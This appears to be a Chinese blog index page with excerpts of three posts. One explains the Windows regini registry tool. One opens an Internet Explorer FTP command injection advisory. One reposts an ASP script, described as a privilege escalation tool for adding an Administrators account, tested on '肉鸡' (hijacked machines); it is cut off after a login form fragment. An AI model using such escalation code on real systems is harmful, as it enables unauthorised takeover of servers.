regini 可是一个好用强大的工具!我仔细查阅了 微软的资料 发现说的含糊不清 google了下也是 寥寥几笔
这个玩意主要用途是 在cmd下 修改注册表 以及 注册表权限!
用法研究了一晚上 弄出来了 ,微软上写的 根本不能用啊 郁闷。。
使用方法
C:\>regini regset.ini 就行啦阅读全文>
发表于 @ 2007年01月18日 01:42:00|评论(loading...)|收藏
itle: Internet Explorer FTP command injection
Author: Albert Puigsech Galicia -
Software: Microsoft Internet Explorer
Versions: >= 6.0.2800.1106
Remote: yes
Exploit: yes
Severity: Low-Medium
- ------------------------------------------------------------------
I. Introduction.
Internet Explorer is a well-known HTTP browser, and like others it can use
more protocols, for example FTP. The security historial of this navigator is
阅读全文>
发表于 @ 2004年12月14日 18:15:00|评论(loading...)|收藏
添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]
作者:蓝屏,凯文 文章来源:冰点极限
其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```
反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。
.network对象脚本权限提升漏洞利用工具
用户:
密码:
"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Serv阅读全文>
发表于 @ 2004年12月14日 18:04:00|评论(loading...)|收藏